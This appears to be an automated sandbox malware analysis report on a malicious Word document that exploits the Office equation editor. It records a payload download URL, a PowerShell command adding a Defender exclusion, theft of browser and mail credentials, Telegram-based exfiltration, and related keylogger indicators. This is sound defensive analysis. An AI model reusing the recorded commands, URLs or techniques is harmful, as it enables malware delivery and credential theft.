                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Rsjwms4Wh8At7jltVf.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, hnb1mywmKd17dlbrAS.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, LVNaJWsMIVA7LTLASE.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, D33N8oUtGVx7cDxPuT.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, ksWtZCxKsl0TxRCTo8.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, lDlgAUP9SyyXYURNLR.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, sC7nprRRvT8OJFZjOZ.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, fSdvMKZMagrtwMm7Ri.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, O9PymkJ3NMlC2399qj.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, pBjySHqM5QnwRNWaSBd.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, KdpVO0auC752URy1LH.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, AnptoFjC7pNu1LqbY6.csHigh entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, qyT5B9fG4eENyHVdsw.csHigh entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, ojeKecA3ycAgUvCgAn.csHigh entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, kIOpWCowqWShKUKAee.csHigh entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, KSQ07YHqchvMXla9N1.csHigh entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csHigh entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 170000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 2130000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 4130000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 5860000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 6860000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 69B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 79B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 1C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 2480000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: 340000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1744
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4194
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Window / User API: threadDelayed 9634
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3292; Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3464; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680; Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3668; Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3740; Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3740; Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3744; Thread sleep count: 190 > 30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3744; Thread sleep count: 9634 > 30
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3812; Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Code function: 9_2_001C7200 LdrInitializeThunk, 9_2_001C7200
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs; Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, FFDecryptor.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, FFDecryptor.cs; Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Memory written: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Queries volume information: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

                Remote Access Functionality

                Source: Yara match; File source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 14 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Install Root Certificate | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Email Collection | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Process Discovery | SSH | 1 Input Capture | 24 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 111 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph (figure not reproduced). ID: 1519253; Sample: Payment Details.doc; Startdate: 26/09/2024; Architecture: WINDOWS; Score: 100
                Process chain shown in the graph: WINWORD.EXE started two EQNEDT32.EXE instances. One EQNEDT32.EXE contacted 66.63.187.123, 49163, 80 (ASN-QUADRANET-GLOBALUS, United States), dropped C:\Users\user\...\ncfplgpeter20306.exe and C:\Users\user\AppData\...\HgCppsoKmxQq[1].exe (both PE32), and started ncfplgpeter20306.exe. That process started powershell.exe and two further ncfplgpeter20306.exe instances, one of which contacted reallyfreegeoip.org, api.telegram.org and 9 other IPs or domains.
                Signatures attached to graph nodes: Initial sample is an obfuscated RTF file; Suricata IDS alerts for network traffic; Found malware configuration; Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Installs new ROOT certificates; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Tries to detect the country of the analysis system (by using the IP); Uses the Telegram API (likely for C&C communication).

                Source | Detection | Scanner | Label | Link
                Payment Details.doc | 45% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
                Payment Details.doc | 100% | Avira | HEUR/Rtf.Malformed |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe | 100% | Avira | HEUR/AGEN.1308792 |
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe | 100% | Avira | HEUR/AGEN.1308792 |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe | 29% | ReversingLabs | Win32.Trojan.CrypterX |
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe | 29% | ReversingLabs | Win32.Trojan.CrypterX |
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown
http://66.63.187.123/txt/HgCppsoKmxQq.exe | true | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | unknown | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
66.63.187.123 | unknown | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
158.101.44.242 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519253
Start date and time: 2024-09-26 09:23:55 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Details.doc
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@11/14@26/9
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 58
                        • Number of non-executed functions: 125
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 77835.314195445 for current running targets taking high CPU consumption
                        • Override analysis time to 155670.62839089 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3272 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Payment Details.doc
Time | Type | Description
03:24:56 | API Interceptor | 302x Sleep call for process: EQNEDT32.EXE modified
03:25:01 | API Interceptor | 8522599x Sleep call for process: ncfplgpeter20306.exe modified
03:25:02 | API Interceptor | 21x Sleep call for process: powershell.exe modified
                                            • 188.114.96.3
                                            checkip.dyndns.comQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.130.0
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.130.0
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73
                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                            • 193.122.130.0
                                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            api.telegram.orgThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
